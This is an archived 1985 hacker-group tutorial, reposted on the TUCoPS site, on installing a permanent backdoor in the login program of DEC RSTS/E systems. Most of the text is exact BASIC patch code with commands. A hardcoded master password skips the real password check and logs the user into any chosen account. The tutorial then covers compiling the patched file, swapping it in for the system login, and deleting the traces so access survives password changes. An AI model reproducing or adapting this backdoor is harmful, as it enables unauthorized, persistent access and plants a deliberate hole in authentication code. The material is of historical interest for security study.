Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Antique Systems :: rsts3.txt

Hacking RSTS/E Systems Part 3




 
 
ShadowSpawn BBS Presents...
 
-------------------------------------------------------------------------------
 
                        INSIDE RSTS/E  VOLUME III
                        -------------------------
 
                            BY: THE MARAUDER
 
                      THE COUNCIL OF THE FEDERATION
 
 The information in this document is intended for informational purposes only
 
            COPYRIGHT (C) - SEPTEMBER 13, 1985, ZONE COMMUNICATIONS
-------------------------------------------------------------------------------
 
     This tutorial will deal with a subject many talk about, but few have
actually accomplished, installing a true back door into an operating system.
 
     I will assume you have managed to get a privleged account on a RSTS/E
system, and have a working knowledge of the basic system commands, and are
somewhat familiar with a RSTS/E based text editor, such as TECO, or EDT.
This procedure should work on all versions of RSTS/E between  V6.0-00, And
V8.5-00.
 
 
1) GETTING STARTED.
 
     Before you actually attempt to install the patches, you need to know a
few things first.. Do the following "test's"..
 
A) before you are logged in, type any charachter followed by a <c/r>
  the system will do 1 of two things, it will either respond with a
  'Please say HELLO', or you will get the system header and the login
  prompt, make a note of which..
 
B) before you are logged in, type 'HELLO', or 'LOGIN' followed by a <c/r>
   The system will respond with one of two possible system headers..
 
  INTELL CORP.. RSTS/E V7.0-01  KB7:  <DIALUP>  20-MAR-85  10:47: PM
  #
                   OR
INTELL CORP.. RSTS/E V7.0-01  KB7:   <DIALUP>   20-MAR-85 10:47 PM
User:
 
Make a note of which login prompt you get, either a '#', or 'User: '.
 
You'll need this when installing the patches..
 
 
2) FINDING LOGIN.
 
     Once you have made the above tests, log into your privleged account
and now you must find the basic source code for the rsts/e login program
which is 'login.Bas', or on some systems 'login.B2s'.  I have generally
found most basic source files located in either '(1,200)', or 'DB1:(1,200)'
so look there first. If you don't find a copy in either of those accounts
then do a 'dir (*,*)login.*', Or a 'dir db1:(*,*)login.*'. If neither of these
directory lookups show up with 'login.Bas' then you either have to upload
your own copy (incidentally, all rsts/e source files are ascii.). Or you're
out of luck.. (But don't panic, most systems do keep a copy of their basic
programs on-line).. Note: if there are more than two drives (db1, db2), you
should search these also.. (Ie. Db3:, db4:, etc..).
 
3) INSTALLING THE 'BACKDOOR' ITSELF.
 
     Once you have found a copy of login.Bas, move it into your account
with pip, (ie. PIP LOGIN.BAS=(*,*)LOGIN.BAS, where (*,*) = the account it's
currently in.). If you have uploaded it then skip that step..
 
  Now you must use one of the systems text editors to install the patches
I preffer TECO. So here you do your 'TECO LOGIN.BAS' and you're ready to
go..
 
     First of all, you must decide on a password that you would like to use
I usually like to use passwords that 'include' the special charachters not
allowed in normal rsts/e passwords, (ie. #,%,&,*,!).  Once you have decided
on the password you'd like (make it a good one, cause it will be permanent).
 You are ready to start the 'patching'..
 
Follow the next steps exactly, and type everything exactly as I have it.
(I will be using '%%ZONE' as my 'BACKDOOR' password..)
 
A) INSERT A LINE #110, HERE PUT IN 'BD$ = "WHATEVER PASSWORD YOU CHOSE"
   IE.   110 BD$ = "%%ZONE"
 
B) at line 12000, count down to the 12th statement for that line.
   It should look something like:
 
    / WAIT 30 UNLESS A%
    / INPUT LINE #1%, P$
    / P$=CVT$$(P$,1%+4%+8%+16+32%+128%+256%)
 
  Directly after the line that reads '/INPUT LINE #1%,P$', you will insert the
following line.
 
    / GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$)) = BD$
 
 So now it should read..
 
     / INPUT LINE #1%, P$
     / GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$))=BD$
     / P$ = CVT$$(P$,1%+4%+8%+16%+32%+128%+256%)
 
C) now insert a line 12011, and type it EXACTLY as follows.
 
12011 I$=SYS(PRIV.ON$)
      / I$=SYS(CHR$(2%))
      / PRINT
      / INPUT "ACCOUNT #";PROJ%,PROG%
      / DIM M1%(30%)
      / M1%(X%)=0% FOR X% = 1% TO 30%
      / M1%(0%) = 9%
      / M1%(1%) = 6%
      / M1%(2%) = 14%
      / M1%(7%) = PROG%
      / M1%(8%) = PROJ%
      / CHANGE M1% TO M$
      / T$ = SYS(M$)
      / PS$ = MID(T$,9%,4%)
      / M$ = CHR$(6%)+CHR$(4%)+STRING$(2%,0%)+CHR$(PROG%)+CHR$(PROJ%)+PS$
      / I$ = SYS(M$)
      / I$ = SYS(CHR$(9%))
      / GOTO 32767
 
 (The previous line of code is what actually does the password lookup, and
  the login, bypassing login's normal security procedure, for those who care.)
 
D) Now, here's where you use the information you got in step 1,
  1) LIST LINE 32600
 If the system you are patchng gave you the login prompt when you hit
Any charachter followed by a <c/r> before you were logged in, and line
32600 Reads.
                 32600 Q$=CHR$(9%)
                 / PRINT FNC$;"PLEASE SAY HELLO"
                 / TIMEOUT% = 17%
Insert the following statement.
 
               32600 Q$=CHR$(9%)
               / GOTO 200   <---- INSERT THIS STATEMENT
               / PRINT FNC$;"PLEASE SAY HELLO"
               / TIMEOUT% = 17%
 
 If the system printed 'Please say HELLO', upon entering any charachter
before being logged in, -DO NOT- change this line.
 
 2) List line 11000, the second statement should be one of the following
     / PRINT FNC$;"USER: ";        OR     / PRINT FNC$;"#";
 
   If the login prompt you got in step 1 was "#", then change that statement
   To read '/ PRINT FNC$;"#"'  (if it dosn't already read that way)
 
  If you got a "User: " prompt in step #1, then change that statement to read
     '/ PRINT FNC$;"User: "'             (** note the space after the ':')
 
 Now, save the program and exit out of the text editor, once you are in basic
do the following..
(I will assume we saved the file under the name: "LOGIN1.BAS")
 
   1) TYPE "OLD LOGIN1.BAS"
 
      If you made any syntax errors, here's where they will show up.  If you
have any errors, go back and correct them with the text editor..
 
2) Once you have succesfully loaded the program into basic (using 'old'), type
 
  'COMPILE', followed by a <c/r>.  This will compile the program into machine
Language, and automatically save a copy in your account under the extension
'.BAC', so if I had loaded 'LOGIN1.BAS' (ie. OLD LOGIN1.BAS'), into memory
and typed 'COMPILE', I would now have a compiled copy in my account under the
name 'login1.Bac' (.Bac = basic compiled, by the way).
 
E) SWAPPING THE PROGRAMS..
 
 Once you have succesfully gotten this far, the last step is to swap your
'doctored' copy of login, with the systems copy of login, you do this simply
by typing: "PIP (1,2)LOGIN.* = LOGIN1.BAC" (assuming you are in the same
account that your copy of 'login1.Bac' is in.. Now the patch is complete
download a copy of your 'patched' basic source, for use on other systems you
may run across.., And then delete all copies of it.. (Except the one you pipped
to account (1,2), of course.)
 
F) USING THE 'BACKDOOR'
 
      To use the backdoor, you simply enter any 'valid' account on the system
when it asks 'user: ', or print's a "#", waiting for your account #, then when
it asks for a password you type in your 'backdoor' password, and login will
print 'enter account #', here type in whichever account you would like to get
into (ie, 1,2 - 1,3 - 1,4 - etc...) And you will be automatically logged into
that account, it should rememble something like this..
 
(STARTING LOGGED OUT OF COURSE..)
HELLO
 
 
INTELL CORP.. RSTS/E V7.9 KB17: <DIALUP> JOB 6 20-JUN-85 10:46 PM
USER: 1,2 <C/R>                 (1,2 IS ENTERED BY YOU)
PASSWORD: %%ZONE <C/R>         (%%ZONE IS ENTERED BY YOU, AND WON'T ECHO)
ACCOUNT # 1,2 <C/R>             (1,2 IS ENTERED BY YOU)
 
NOW YOU WILL GET THE 'READY' PROMPT, AND BE LOGGED INTO ACCOUNT 1,2..
 
 
 Now you have full acess to the system no matter what they change any password
to, and for as long as they remain using any version of RSTS/E under V9.0..
 
           So until next time..
                                      Dial with care.......
 
                                       THE
                                         MARAUDER
                                COUNCIL OF THE FEDERATION
 
-------------------------------------------------------------------------------




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH